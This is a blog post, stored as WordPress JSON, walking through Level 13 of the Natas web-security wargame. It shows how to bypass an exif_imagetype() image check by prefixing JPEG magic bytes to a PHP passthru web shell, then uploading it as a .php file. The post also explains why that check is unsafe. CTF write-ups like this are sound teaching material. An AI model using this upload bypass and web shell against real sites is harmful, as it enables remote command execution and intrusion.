{"id":350,"date":"2012-11-01T23:04:18","date_gmt":"2012-11-02T06:04:18","guid":{"rendered":"http:\/\/seanmurphree.com\/blog\/?p=350"},"modified":"2012-11-20T16:24:26","modified_gmt":"2012-11-21T00:24:26","slug":"natas-level-13-image-file-restricted-upload","status":"publish","type":"post","link":"https:\/\/seanmurphree.com\/blog\/?p=350","title":{"rendered":"Natas Level 13 &#8211; Image File Restricted Upload"},"content":{"rendered":"<p>In this post we&#8217;re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire.<\/p>\n<h2>What&#8217;s Going On?<\/h2>\n<p>Upon logging in, we see nearly the same setup as in level 12, except for the statement that uploading is restricted to image files only. \u00a0To see how that restriction is enforced, let&#8217;s take a look at the source code. \u00a0Viewing the source code, we can see that it is nearly all identical, except for two lines. \u00a0There is now an additional check on the file being uploaded. \u00a0This check uses the exif_imagetype() function to determine whether the file being uploaded is an image file or not. \u00a0If it isn&#8217;t, an error is printed to the screen and the file isn&#8217;t uploaded. \u00a0If it is determined to be an image file, the file is uploaded and a link to it is printed to the screen. \u00a0So, since this level checks the file&#8217;s type, what can we do with it?<\/p>\n<h2>Exploit<\/h2>\n<p>Let&#8217;s RTFM for <a href=\"http:\/\/php.net\/manual\/en\/function.exif-imagetype.php\" target=\"_blank\">exif_imagetype()<\/a>. \u00a0Doing so, we see that it &#8220;reads the first bytes of an image and checks its signature.&#8221; \u00a0Ok, neat. \u00a0But what can we do with that? 
\u00a0Well, if we take the time (seconds) to Google something like &#8220;first bytes of jpg&#8221; and click on the 3rd link, we might just find a <a title=\"Identifying Files From Their first 4 Bytes Or Magic Numbers\" href=\"http:\/\/www.mindfiresolutions.com\/Identifying-Files-From-Their-first-4-Bytes-Or-Magic-Numbers-72.php\" target=\"_blank\">site<\/a> that tells us that &#8220;a JPEG image file is always found to hold the value FF D8 FF E0 (Hex) in the first four bytes.&#8221; \u00a0Great. \u00a0So now we need to construct a file with those four specific hex bytes as the first four bytes of the file, and end it with our PHP snippet from the last level.<\/p>\n<p>So, to write the hex data, let&#8217;s jump to our Linux command line. \u00a0To write the hex bytes and the PHP into one file, let&#8217;s use the following commands:<\/p>\n<blockquote><p>[somebox]$ echo 'FFD8FFE0' | xxd -r -p &gt;&gt; natas13attackfile.php<br \/>\n[somebox]$ echo \"&lt;? passthru(\\$_GET['h']); ?&gt;\" &gt;&gt; natas13attackfile.php<\/p><\/blockquote>\n<p>We should now have our correctly crafted &#8220;image&#8221; file. \u00a0Now, we simply have to follow what we did in the last level to upload it. \u00a0Download the current level&#8217;s HTML, alter the action URL in the form declaration and change the filename field&#8217;s value to a .php extension. \u00a0Now, use your browser to log into the natas13 website, then use your local page to submit the upload file. \u00a0After upload, follow the link and perform the same command as last time, except this time let&#8217;s check out the natas14 file! \u00a0Upon execution, this tactic works, and the Level 14 password is revealed.<\/p>\n<h2>So What?<\/h2>\n<p>In an attempt to limit file uploads to images, this level uses exif_imagetype(). \u00a0However, this function only looks at the first few bytes of the file. 
\u00a0Additionally, PHP only evaluates certain parts of a file, specifically the parts between &lt;? and ?&gt;. \u00a0Because of this, we were still able to produce a file that starts with the first bytes of an image and later contains valid PHP within PHP tags. \u00a0Also, this level didn&#8217;t fix the problem of being able to upload a file with a PHP extension, which causes it to be run through the PHP interpreter. \u00a0Together, these issues produce the vulnerability we were able to exploit, and they show that this isn&#8217;t a safe way to accept user files.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this post we&#8217;re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire. What&#8217;s Going On? Upon logging in, we see nearly the same setup as in level 12, except for the statement &hellip; <a href=\"https:\/\/seanmurphree.com\/blog\/?p=350\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[36,35,4],"tags":[43,42,13,38],"_links":{"self":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/350"}],"collection":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=350"}],"version-history":[{"count":4,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/350\/revisions"}],"predecessor-version":[{"id":376,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/350\/revisions\/376"}],"wp:attachment":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}